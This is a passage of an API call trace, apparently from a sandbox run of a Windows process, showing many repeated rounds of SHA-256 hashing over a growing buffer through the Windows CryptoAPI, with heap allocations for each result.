	[0253.118] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c49c8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c49c8, pdwDataLen=0x128c3c) returned 1
	[0253.118] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.118] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.119] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.119] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.119] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0253.119] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c49f0
	[0253.119] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c49f0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c49f0, pdwDataLen=0x128c3c) returned 1
	[0253.119] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.119] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.119] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.119] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.119] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0253.119] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4a18
	[0253.119] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4a18, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4a18, pdwDataLen=0x128c3c) returned 1
	[0253.119] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.119] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.120] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.120] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.120] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0253.120] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4a40
	[0253.120] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4a40, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4a40, pdwDataLen=0x128c3c) returned 1
	[0253.120] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.120] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.120] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.120] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.120] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0253.120] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4a68
	[0253.120] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4a68, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4a68, pdwDataLen=0x128c3c) returned 1
	[0253.120] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.121] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.121] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.121] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.121] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0253.121] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4a90
	[0253.121] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4a90, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4a90, pdwDataLen=0x128c3c) returned 1
	[0253.121] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.121] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.121] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.121] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.121] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0253.122] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4ab8
	[0253.122] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4ab8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4ab8, pdwDataLen=0x128c3c) returned 1
	[0253.122] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.122] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.122] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.122] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.122] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0253.122] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4ae0
	[0253.122] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4ae0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4ae0, pdwDataLen=0x128c3c) returned 1
	[0253.122] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.122] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.122] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.123] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.123] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0253.123] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4b08
	[0253.123] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4b08, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4b08, pdwDataLen=0x128c3c) returned 1
	[0253.123] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.123] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.123] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.123] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.123] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0253.123] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4b30
	[0253.123] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4b30, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4b30, pdwDataLen=0x128c3c) returned 1
	[0253.123] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.123] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.123] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.124] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.124] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0253.124] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4b58
	[0253.124] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4b58, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4b58, pdwDataLen=0x128c3c) returned 1
	[0253.124] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.124] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.124] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.124] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.124] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0253.124] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4b80
	[0253.124] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4b80, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4b80, pdwDataLen=0x128c3c) returned 1
	[0253.124] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.124] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.124] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.125] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.125] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0253.125] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4ba8
	[0253.125] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4ba8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4ba8, pdwDataLen=0x128c3c) returned 1
	[0253.125] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.125] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.125] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.125] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.125] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0253.125] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4bd0
	[0253.125] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4bd0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4bd0, pdwDataLen=0x128c3c) returned 1
	[0253.125] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.125] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.125] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.126] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.126] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0253.126] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4bf8
	[0253.126] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4bf8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4bf8, pdwDataLen=0x128c3c) returned 1
	[0253.126] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.126] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.126] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.126] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.126] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0253.126] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4c20
	[0253.126] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4c20, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4c20, pdwDataLen=0x128c3c) returned 1
	[0253.126] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.127] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.127] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.127] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.127] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0253.127] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4c48
	[0253.127] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4c48, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4c48, pdwDataLen=0x128c3c) returned 1
	[0253.127] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.127] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.127] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.127] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.127] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0253.127] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4c70
	[0253.127] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4c70, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4c70, pdwDataLen=0x128c3c) returned 1
	[0253.127] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.128] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.128] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.128] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.128] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0253.128] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4c98
	[0253.128] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4c98, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4c98, pdwDataLen=0x128c3c) returned 1
	[0253.128] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.128] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.128] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.128] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.128] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0253.128] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4cc0
	[0253.128] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4cc0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4cc0, pdwDataLen=0x128c3c) returned 1
	[0253.128] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.129] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.129] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.129] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.129] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0253.129] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4ce8
	[0253.129] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4ce8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4ce8, pdwDataLen=0x128c3c) returned 1
	[0253.129] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.129] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.129] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.130] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.130] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0253.130] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4d10
	[0253.130] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4d10, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4d10, pdwDataLen=0x128c3c) returned 1
	[0253.130] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.130] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.130] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.130] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.130] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0253.130] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4d38
	[0253.130] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4d38, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4d38, pdwDataLen=0x128c3c) returned 1
	[0253.130] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.130] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.131] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.131] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.131] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0253.131] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4d60
	[0253.131] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4d60, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4d60, pdwDataLen=0x128c3c) returned 1
	[0253.131] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.131] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.131] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.132] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.132] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0253.132] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4d88
	[0253.132] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4d88, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4d88, pdwDataLen=0x128c3c) returned 1
	[0253.132] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.132] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.132] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.133] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.133] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0253.133] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4db0
